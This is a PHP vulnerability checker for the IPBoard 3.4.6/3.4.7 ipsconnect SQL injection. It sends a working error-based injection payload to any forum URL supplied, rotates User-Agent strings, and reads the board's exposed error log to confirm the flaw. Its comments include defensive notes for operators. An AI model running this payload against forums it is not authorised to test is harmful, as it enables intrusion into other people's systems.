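<?php
/**
 * Single-target checker for the IPBoard 3.4.6 / 3.4.7 ipsconnect SQL injection.
 *
 * Usage: request this script with ?q=<forum base URL>, for example
 * ?q=http://apples.org/path/to/forums
 *
 * What the check does:
 *   1. POSTs a fixed login request to <base>/interface/ipsconnect/ipsconnect.php.
 *      The second id[] element wraps SELECT COUNT(*) FROM members in an
 *      extractvalue() call, so an unpatched board raises an XPATH error.
 *   2. GETs <base>/cache/sql_error_latest.cgi and searches it for
 *      "XPATH syntax error".
 *
 * Limits of the verdict:
 *   - "not vulnerable" only means the marker was not found in a readable error
 *     log. A board whose cache/ directory is not served over HTTP yields the
 *     same answer, so a negative result is not proof of a patched install.
 *   - The marker is not tied to this run; an older log entry containing the
 *     same text produces a positive result.
 *
 * Notes for forum operators: in access logs the check appears as a POST to
 * interface/ipsconnect/ipsconnect.php with act=login and an id[] array,
 * followed by a GET of cache/sql_error_latest.cgi. Install the vendor's
 * security update for the 3.4.x line and deny web access to the cache/*.cgi
 * error logs.
 *
 * NOTE(review): the script has no access control and requests whatever URL the
 * caller supplies. Deployed on a reachable web server it acts as a request
 * relay (SSRF), so keep it behind authentication or run it locally only.
 */

if (isset($_GET['q'])) {
    // Rejects non-string input (?q[]=...) and anything that is not an
    // http:// or https:// URL with a host part.
    $host = normalizeTargetUrl($_GET['q']);

    if ($host !== null) {
        // The target comes straight from the query string and is echoed back
        // in the result line; escape it once so it cannot inject markup.
        $safeHost = htmlspecialchars($host, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');

        // Initial SQL injection check.
        $newHost = $host . '/interface/ipsconnect/ipsconnect.php';
        $data = "act=login&idType=id&id[]=-1&id[]=-1%29%20and%201%21%3D%22%27%22%20and%20extractvalue%281%2Cconcat%280x3a%2C%28SELECT%20COUNT%28%2A%29%20FROM%20members%29%29%29%23%27";
        $postResponse = SendPost($newHost, $data);

        // Check the SQL error log for confirmation.
        $url = $host . '/cache/sql_error_latest.cgi';
        $logResponse = SendGet($url);

        if ($postResponse === false || $logResponse === false) {
            // A transport failure says nothing about the target; report it as
            // inconclusive instead of "not vulnerable".
            printf("Could not check %s: the request failed.", $safeHost);
        } elseif (strpos($logResponse, "XPATH syntax error") !== false) {
            printf("%s is vulnerable to IPBoard 3.4.6 or 3.4.7 SQL Injection!", $safeHost);
        } else {
            printf("%s is not vulnerable to IPBoard 3.4.6 or 3.4.7 SQL Injection!", $safeHost);
        }

        // Ends the script here (or hands false back to an including file).
        return false;
    } else {
        echo "Invalid host, needs to have a protocol -> http://apples.org/path/to/forums";
    }
} else {
    echo "I think you're lost homie.";
}

/**
 * Validates the caller-supplied base URL and strips trailing slashes.
 *
 * @param mixed $raw Value of the q parameter.
 * @return string|null The base URL without trailing slashes, or null when the
 *                     value is not a string, has no host, or uses a scheme
 *                     other than http/https.
 */
function normalizeTargetUrl($raw)
{
    if (!is_string($raw)) {
        return null;
    }

    $parts = parse_url($raw);
    if ($parts === false || !isset($parts['scheme'], $parts['host'])) {
        return null;
    }

    $scheme = strtolower($parts['scheme']);
    if ($scheme !== 'http' && $scheme !== 'https') {
        return null;
    }

    return rtrim($raw, '/');
}

/**
 * Returns one User-Agent string picked at random from a fixed list of browser
 * identifiers.
 *
 * Each request picks its own value, so the two requests of a single check can
 * carry different User-Agent headers. Log correlation should key on client
 * address and request paths rather than on this header.
 *
 * @return string
 */
function getRandomUserAgent()
{
    $userAgents = array(
        "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6",
        "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)",
        "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)",
        "Opera/9.20 (Windows NT 6.0; U; en)",
        "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 8.50",
        "Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.02 [en]",
        "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; fr; rv:1.7) Gecko/20040624 Firefox/0.9",
        "Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/48 (like Gecko) Safari/48"
    );

    return $userAgents[array_rand($userAgents)];
}

/**
 * Sends a POST request and returns the response body.
 *
 * @param string $site Full URL to request.
 * @param string $post URL-encoded request body.
 * @return string|false Response body, or false when the transfer failed.
 */
function SendPost($site, $post)
{
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $site);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($ch, CURLOPT_USERAGENT, getRandomUserAgent());
    curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
    // The URL is caller-controlled: pin the handle to HTTP(S) so no other
    // libcurl protocol handler can be reached, and bound the wait.
    curl_setopt($ch, CURLOPT_PROTOCOLS, CURLPROTO_HTTP | CURLPROTO_HTTPS);
    curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 10);
    curl_setopt($ch, CURLOPT_TIMEOUT, 30);
    $response = curl_exec($ch);
    curl_close($ch);

    return $response;
}

/**
 * Sends a GET request and returns the response body; used to read the SQL
 * error log.
 *
 * @param string $site Full URL to request.
 * @return string|false Response body, or false when the transfer failed.
 */
function SendGet($site)
{
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $site);
    curl_setopt($ch, CURLOPT_USERAGENT, getRandomUserAgent());
    curl_setopt($ch, CURLOPT_HEADER, 0);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    // Same restrictions as SendPost(): HTTP(S) only, bounded wait.
    curl_setopt($ch, CURLOPT_PROTOCOLS, CURLPROTO_HTTP | CURLPROTO_HTTPS);
    curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 10);
    curl_setopt($ch, CURLOPT_TIMEOUT, 30);
    $response = curl_exec($ch);
    curl_close($ch);

    return $response;
}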